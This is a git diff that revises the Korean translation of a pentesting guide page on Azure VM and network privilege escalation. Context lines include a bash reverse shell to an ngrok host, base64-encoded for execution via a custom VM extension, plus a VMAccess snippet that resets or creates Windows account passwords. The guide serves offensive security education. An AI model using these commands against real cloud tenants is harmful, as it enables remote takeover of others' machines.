diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md index b8a006cc2..407acbe45 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md @@ -12,13 +12,13 @@ Azure Virtual Machines 및 Network에 대한 자세한 정보는 다음을 확 ### **`Microsoft.Compute/virtualMachines/extensions/write`** -이 권한은 가상 머신에서 확장을 실행할 수 있게 하며, 이를 통해 **임의의 코드를 실행할 수 있습니다**.\ +이 권한은 가상 머신에서 확장을 실행할 수 있게 하여 **임의의 코드를 실행할 수 있게 합니다**.\ VM에서 임의의 명령을 실행하기 위해 사용자 정의 확장을 악용하는 예: {{#tabs }} {{#tab name="Linux" }} -- 리버스 쉘 실행 +- 리버스 셸 실행 ```bash # Prepare the rev shell echo -n 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/13215 0>&1' | base64 @@ -91,9 +91,9 @@ Set-AzVMAccessExtension -ResourceGroupName "" -VMName "" -Na
-VMAccess 확장 +VMAccess extension -이 확장은 Windows VM 내의 사용자 비밀번호를 수정(또는 존재하지 않는 경우 생성)할 수 있게 해줍니다. +이 확장은 Windows VM 내의 사용자 비밀번호를 수정(또는 존재하지 않을 경우 생성)할 수 있게 해줍니다. ```bash # Run VMAccess extension to reset the password $cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password @@ -157,13 +157,13 @@ Set-AzVMDscExtension ` 하이브리드 런북 워커 -이것은 자동화 계정에서 VM에서 런북을 실행할 수 있도록 하는 VM 확장입니다. 더 많은 정보는 [Automation Accounts service](../az-services/az-automation-account/index.html)를 확인하세요. +이것은 자동화 계정에서 VM에서 런북을 실행할 수 있도록 하는 VM 확장입니다. 자세한 내용은 [Automation Accounts service](../az-services/az-automation-account/index.html)를 확인하세요.
### `Microsoft.Compute/disks/write, Microsoft.Network/networkInterfaces/join/action, Microsoft.Compute/virtualMachines/write, (Microsoft.Compute/galleries/applications/write, Microsoft.Compute/galleries/applications/versions/write)` -이것들은 **새로운 갤러리 애플리케이션을 생성하고 VM 내에서 실행하기 위한 필수 권한**입니다. 갤러리 애플리케이션은 무엇이든 실행할 수 있으므로 공격자는 이를 악용하여 임의의 명령을 실행하는 VM 인스턴스를 손상시킬 수 있습니다. +이것들은 **새 갤러리 애플리케이션을 생성하고 VM 내에서 실행하기 위해 필요한 권한**입니다. 갤러리 애플리케이션은 무엇이든 실행할 수 있으므로 공격자는 이를 악용하여 임의의 명령을 실행하는 VM 인스턴스를 손상시킬 수 있습니다. 마지막 2개의 권한은 애플리케이션을 테넌트와 공유함으로써 회피할 수 있습니다. @@ -351,6 +351,6 @@ https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/ ### TODO: Microsoft.Compute/virtualMachines/WACloginAsAdmin/action -[**문서**](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/compute#microsoftcompute)에 따르면, 이 권한은 Windows Admin Center를 통해 리소스의 OS를 관리할 수 있게 해줍니다. 따라서 이는 WAC에 대한 액세스를 제공하여 VM을 제어할 수 있는 것처럼 보입니다... +[**문서**](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/compute#microsoftcompute)에 따르면, 이 권한은 Windows Admin Center를 통해 리소스의 OS를 관리자 권한으로 관리할 수 있게 해줍니다. 따라서 이는 WAC에 대한 접근을 제공하여 VM을 제어할 수 있게 하는 것 같습니다... {{#include ../../../banners/hacktricks-training.md}}